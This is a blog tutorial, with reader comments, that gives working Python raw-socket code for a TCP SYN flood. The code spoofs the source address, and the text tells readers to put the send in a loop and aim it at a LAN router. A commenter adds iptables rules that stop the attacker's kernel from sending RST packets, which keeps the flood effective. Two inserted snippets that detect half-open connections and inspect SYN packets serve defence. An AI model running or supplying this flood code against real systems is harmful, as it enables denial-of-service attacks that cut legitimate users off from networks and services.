Syn flood program in python using raw sockets (Linux)



BinaryTides

By Silver Moon on Oct 2, 2012

Syn flood and raw sockets


A syn flood program sends out a large number of tcp syn packets to a remote host on a particular port number. Syn packets are intended to initiate a tcp connection. However, if a large number of syn packets are sent without any purpose, then it would consume a lot of resources like memory on the remote system. This concept is used in denial of service (dos) attacks. It is like jamming the networking path of a remote machine or device. This results in the device being unable to serve actual requests from legitimate users.

In this article we are going to write a very simple syn flood program in python. A syn flood program works by creating syn packets, which need raw socket support. Linux has raw socket support natively and hence the program shown in this example shall work only on a linux system even though python itself is platform independent. This is because the underlying socket libraries are different on windows and linux.
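On the receiving host, the resource consumption described above shows up as connections parked in the SYN_RECV state. The following is an added example, not code from the original article: it counts those half-open entries per listening port from text in `/proc/net/tcp` layout. The function names, the threshold and the sample rows are assumptions made for illustration, and the address decoding assumes a little-endian host.

```python
import socket
import struct
from collections import defaultdict

TCP_SYN_RECV = 0x03  # state code /proc/net/tcp prints for half-open connections

def _endpoint(field):
    """Decode 'HEXADDR:HEXPORT' as printed by a little-endian kernel."""
    addr, port = field.split(":")
    return socket.inet_ntoa(struct.pack("<I", int(addr, 16))), int(port, 16)

def half_open_summary(proc_net_tcp):
    """Map each local (ip, port) to the remote IPs waiting in SYN_RECV."""
    pending = defaultdict(list)
    for line in proc_net_tcp.splitlines()[1:]:  # skip the column header
        cols = line.split()
        if len(cols) < 4 or int(cols[3], 16) != TCP_SYN_RECV:
            continue
        pending[_endpoint(cols[1])].append(_endpoint(cols[2])[0])
    return dict(pending)

def flooded_listeners(proc_net_tcp, threshold):
    """Return (ip, port, half_open, distinct_sources) for ports at or over threshold."""
    return sorted(
        (ip, port, len(srcs), len(set(srcs)))
        for (ip, port), srcs in half_open_summary(proc_net_tcp).items()
        if len(srcs) >= threshold
    )

# Constructed sample in /proc/net/tcp layout: one LISTEN socket, one
# ESTABLISHED ssh session, and four half-open entries on port 80.
SAMPLE = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0101A8C0:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1001
   1: 0101A8C0:0016 3201A8C0:D431 01 00000000:00000000 02:000A0000 00000000     0        0 1002
   2: 0101A8C0:0050 6501A8C0:04D2 03 00000000:00000000 01:00000050 00000001     0        0 0
   3: 0101A8C0:0050 077100CB:04D3 03 00000000:00000000 01:00000050 00000001     0        0 0
   4: 0101A8C0:0050 096433C6:04D4 03 00000000:00000000 01:00000050 00000002     0        0 0
   5: 0101A8C0:0050 2C0200C0:04D5 03 00000000:00000000 01:00000050 00000002     0        0 0
"""

if __name__ == "__main__":
    # On a live Linux host: flooded_listeners(open("/proc/net/tcp").read(), 64)
    for ip, port, n, sources in flooded_listeners(SAMPLE, threshold=3):
        print("%s:%d has %d half-open connections from %d sources" % (ip, port, n, sources))
```

Many half-open entries from many distinct sources on one port is the pattern to alert on; a sensible threshold depends on the listener's normal traffic.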

Code
The theory behind the code is quite simple. Just create a raw socket and a tcp syn packet and send the packet over the raw socket. That is all that needs to be done. Here is the program:
```python
'''
    Syn flood program in python using raw sockets (Linux)

    Silver Moon (m00n.silv3r@gmail.com)
'''

# some imports
import socket, sys
from struct import *

# checksum function needed for calculating the tcp checksum
def checksum(msg):
    s = 0
    # loop taking 2 characters at a time
    for i in range(0, len(msg), 2):
        w = (ord(msg[i]) << 8) + (ord(msg[i+1]))
        s = s + w

    s = (s >> 16) + (s & 0xffff)
    #s = s + (s >> 16)
    # complement and mask to a 2 byte short
    s = ~s & 0xffff

    return s

# create a raw socket
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)
except socket.error, msg:
    print 'Socket could not be created. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
    sys.exit()

# tell kernel not to put in headers, since we are providing it
s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)

# now start constructing the packet
packet = ''

source_ip = '192.168.1.101'
dest_ip = '192.168.1.1'  # or socket.gethostbyname('www.google.com')

# ip header fields
ihl = 5
version = 4
tos = 0
tot_len = 20 + 20  # with IP_HDRINCL the kernel fills in the total length itself
id = 54321  # Id of this packet
frag_off = 0
ttl = 255
protocol = socket.IPPROTO_TCP
check = 10  # with IP_HDRINCL the kernel fills in the ip header checksum itself
saddr = socket.inet_aton(source_ip)  # Spoof the source ip address if you want to
daddr = socket.inet_aton(dest_ip)

ihl_version = (version << 4) + ihl

# the ! in the pack format string means network order
ip_header = pack('!BBHHHBBH4s4s', ihl_version, tos, tot_len, id, frag_off, ttl, protocol, check, saddr, daddr)

# tcp header fields
source = 1234  # source port
dest = 80  # destination port
seq = 0
ack_seq = 0
doff = 5  # 4 bit field, size of tcp header, 5 * 4 = 20 bytes
# tcp flags
fin = 0
syn = 1
rst = 0
psh = 0
ack = 0
urg = 0
window = 5840  # maximum allowed window size; pack('!H') already converts to network order
check = 0
urg_ptr = 0

offset_res = (doff << 4) + 0
tcp_flags = fin + (syn << 1) + (rst << 2) + (psh << 3) + (ack << 4) + (urg << 5)

# the ! in the pack format string means network order
tcp_header = pack('!HHLLBBHHH', source, dest, seq, ack_seq, offset_res, tcp_flags, window, check, urg_ptr)

# pseudo header fields
source_address = socket.inet_aton(source_ip)
dest_address = socket.inet_aton(dest_ip)
placeholder = 0
protocol = socket.IPPROTO_TCP
tcp_length = len(tcp_header)

psh = pack('!4s4sBBH', source_address, dest_address, placeholder, protocol, tcp_length)
psh = psh + tcp_header

tcp_checksum = checksum(psh)

# make the tcp header again and fill the correct checksum
tcp_header = pack('!HHLLBBHHH', source, dest, seq, ack_seq, offset_res, tcp_flags, window, tcp_checksum, urg_ptr)

# final full packet - syn packets dont have any data
packet = ip_header + tcp_header

# Send the packet finally - the port specified has no effect
s.sendto(packet, (dest_ip, 0))  # put this in a loop if you want to flood the target

# put the above line in a loop like while 1: if you want to flood
```

The above program has to be run with root privileges. Raw sockets need root privileges. On Ubuntu, prefix sudo when running the script.

```
$ sudo python tcp_syn.py
```

Also note that if a firewall like firestarter is running then it might block the syn packets from being delivered. Use a packet sniffer like wireshark to check that the packet was generated and transmitted properly.

Many more things can be added to the above program. Put the sendto in a loop and it would send out a huge number of syn packets, flooding the target system. Also try to change the source ip and source port in each packet in a loop. For this the pseudo header and tcp header checksum need to be recalculated every time. The best thing to try this program on would be your LAN router. It might get disconnected or even restart itself if it is unable to handle a syn flood attack.
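What a sniffer or sensor does with such a packet once it is captured, as an added example that is not part of the original article: decode the IPv4 and TCP headers, verify the TCP checksum over the pseudo header, and flag a SYN that carries no TCP options. The function names, the hex sample (constructed from the article's field values) and the "bare SYN" heuristic are assumptions of this example.

```python
import socket
import struct

def inet_checksum(data):
    """RFC 1071 checksum: ones' complement of the 16-bit ones' complement sum."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total >> 16) + (total & 0xFFFF)
    return ~total & 0xFFFF

def inspect_ipv4_tcp(pkt):
    """Decode an IPv4/TCP packet and verify its TCP checksum."""
    if len(pkt) < 40 or pkt[0] >> 4 != 4 or pkt[9] != socket.IPPROTO_TCP:
        raise ValueError("not an IPv4/TCP packet")
    ihl = (pkt[0] & 0x0F) * 4
    src, dst, segment = pkt[12:16], pkt[16:20], pkt[ihl:]
    sport, dport, _seq, _ack, off, flags = struct.unpack("!HHLLBB", segment[:14])
    # Pseudo header: source, destination, zero byte, protocol, TCP length.
    pseudo = src + dst + struct.pack("!BBH", 0, pkt[9], len(segment))
    syn_only = (flags & 0x3F) == 0x02
    has_options = (off >> 4) * 4 > 20
    return {
        "src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst),
        "sport": sport, "dport": dport, "ttl": pkt[8],
        "syn_only": syn_only,
        "has_options": has_options,
        # Summed with the checksum field left in place, a valid segment yields 0.
        "checksum_ok": inet_checksum(pseudo + segment) == 0,
        # Heuristic (assumption): ordinary TCP stacks put at least an MSS option in a SYN.
        "bare_syn": syn_only and not has_options,
    }

# Constructed sample: the 40-byte SYN described by the article's field values
# (192.168.1.101:1234 -> 192.168.1.1:80, ttl 255, id 54321, window 5840).
SAMPLE_SYN = bytes.fromhex(
    "45000028d4310000ff0663e7c0a80165c0a80101"  # IPv4 header
    "04d200500000000000000000500216d0103a0000"  # TCP header, no options
)

if __name__ == "__main__":
    print(inspect_ipv4_tcp(SAMPLE_SYN))
```

A packet whose source address was changed without recomputing the pseudo-header checksum fails `checksum_ok`, which is why the article says the checksum has to be recalculated for every packet.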
Last Updated On: 30th November 2012

www.binarytides.com/python-syn-flood-program-raw-sockets-linux/

About Silver Moon
PHP developer, blogger and Linux enthusiast. He can be reached at m00n.silv3r@gmail.com. Or find him on Google+

3 comments

foreverzeus (4 months ago)

hi, when I use this to connect to a socket server on another pc from a linux pc, when I send a syn packet then the server sends me a syn+ack packet. But, at the same time, the linux pc sends the server a rst packet, but this packet is not sent by my program. Why? I changed my port but nothing.

Silver Moon (Mod), replying to foreverzeus (4 months ago)

The syn packet is sent by the program, but the syn+ack packet is received by the kernel. Now the kernel is unaware of any syn packets sent, since it did not send the syn packet. In such a case it finds the syn+ack packet unexpected and so replies with a rst server to tell the remote server that this is not a valid connection and should be closed down. This is the default behaviour on both windows and linux, and there is no easy way to prevent the kernel from sending the rst packets.

crazy4linux, replying to Silver Moon (a month ago)

If the attacker's platform is linux then we can configure the kernel to drop all outgoing rst flag packets by the following rules:

```
iptables -A OUTPUT -p tcp -s 192.168.56.101 --tcp-flags RST RST -j DROP
iptables -A OUTPUT -p tcp -s 192.168.56.103 --tcp-flags RST RST -j DROP
```

For further reference follow this link: http://www.linuxforu.com/2011/...
